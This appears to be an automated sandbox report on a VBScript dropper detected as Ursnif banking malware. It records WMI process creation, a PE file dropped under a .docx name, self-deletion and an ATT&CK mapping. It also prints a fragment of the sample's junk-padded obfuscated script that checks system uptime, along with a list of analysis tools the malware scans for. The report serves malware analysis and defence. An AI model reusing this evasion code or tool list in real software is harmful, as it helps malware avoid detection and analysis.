            Source: Yara matchFile source: 00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499957979.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500113123.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500143060.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500131153.00000000052D8000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499957979.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500113123.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500143060.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500131153.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\irritable.docx C166B0023FC766351CF635FB0CBA02C2116825C4F8D8E139D4B2CDB6554E81EA
            Source: IYhAQFCrF1sk.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal100.troj.evad.winVBS@13/68@22/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{A820A08F-F7CF-11EA-90E2-ECF4BB862DED}.datJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\IYhAQFCrF1sk.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: IYhAQFCrF1sk.vbsVirustotal: Detection: 17%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\IYhAQFCrF1sk.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:9474 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6992 CREDAT:9474 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:8 CREDAT:9474 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:9474 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:9474 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6992 CREDAT:9474 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:8 CREDAT:9474 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:9474 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync
            Source: IYhAQFCrF1sk.vbsStatic file information: File size 1374433 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: c:\39\58\we\She\dollar\54\fun\17\58\Written\56\Coast.pdb source: irritable.docx.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(638293031)) > 0 And compendia391 = 0) ThenExit FunctionEnd If' whod breakthrough baleful peephole cocoa administer Bern spacetime sweatband Renoir pang keen inhalation windbag domestic whatever, 3959229 associable fervid influent GPO Schloss Urdu offal Faust Joaquin lapelled perilous horrible943 sequestration auric911 plan385 serial993 trial standeth Jon smog ice digitalis996 emplace denote balustrade144 electroencephalograph commonality moonbeam keyword metamorphic loop332. interpretive indirect stork inductor lacrosse set problem480 = GetObject("winmgmts:\\.\root\cimv2")set sqXAi = problem480.InstancesOf("Win32_OperatingSystem")REM follicle674 Conrail chine science188 colorimeter serenade994 demur oxalic stretch, 8568349 soulful, sneeze Aquarius, nick FAA destitute herself excessive Leroy726 toolmake Jacobson neonate hillmen soignee ineducable transferor survivor polyhedral ROTC wrath318 sedan condolence nightfall interceptor historian picojoule screwbean opprobrium705 tease levity syllabic alba Cynthia benchmark variable projectile. 9323556 euphorbia loll althea balm mallard. tau solid eddy Burch tan445 Marjorie Montague crowfoot prompt. allow beware civilian sculpture611 Lucretius. benight849, 8269140 pelvis tenure lectern viscometer marvelous stickleback parry Pullman Baxter for each entomology in sqXAiREM gallium, thermo, Pilate, oratoric stonecrop vertex raucous carry glassine dirty joint290 mucosa poultice contradictory772 Othello eager Newcastle apex asperity aqua Orestes jackdaw carryover. Shelton Allan thrush. Huxley sip688, quip neater624 Madras massif. Xavier tupelo primp, insult catenate lesion satiety roomful Viet63 elfin spheroidal grassy incommutable Elmer Meiji orthonormal kerchief midshipmen omnipresent bedfast implicit495 shrub678 decibel Charlemagne morsel denumerable coltish. 6639792 point marriage Drexel erudition400 Acapulco ATEmb = entomology.LastBootUpTimecnfkGw = Mid(ATEmb,1,4) & "-" & Mid(ATEmb,5,2) & "-" & Mid(ATEmb,7,2) & " " & Mid(ATEmb,9,2) & ":" & Mid(ATEmb,11,2) & ":" & Mid(ATEmb,13,2)REM anatomist beth wing symbolic Hayes gallstone Quakeress cheeky, 330596 Yarmouth hybrid gent indigene Medea414 Belshazzar narcotic transposable. cessation rhapsody. 1410370 Bausch algebraic jaunty pinnate macabre justiciable. 6889385 buildup, recruit264 condemn prey flannel729 Orinoco murder Kirkland Papua checksumming cutthroat cameraman716 enunciate fluid Ostrander Angela cretinous anthracite sorrel Beverly370 scarp superfluous barn acrylic Keynes, injury Lares vomit493 stopwatch837 equilibrium Donner scrounge true417 Cromwellian baroque part940 psychometry795 manipulate tumble. 555949 brownish briar Moluccas mock this unanimity trichloroethane simmer338 mantis Markov interruptible blackguard terrestrial salmonella archbishop. 7134769 docket hank aphasia Canaveral Keller realtor follicular amende fortunate terpsichorean Marlene kQBBGBec = abs(datediff("s",cnfkGw,now))YUCYVJ = kQBBGBec \ 60melan

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\irritable.docxJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499957979.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500113123.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500143060.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500131153.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\iyhaqfcrf1sk.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            WScript reads language and country specific registry keys (likely country aware script)Show sources
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\irritable.docxJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 1488Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: irritable.docx.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499957979.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500113123.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500143060.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500131153.00000000052D8000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.499957979.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500113123.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500143060.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.500131153.00000000052D8000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation121Path InterceptionProcess Injection1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion4LSASS MemorySecurity Software Discovery24Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerVirtualization/Sandbox Evasion4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery125SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet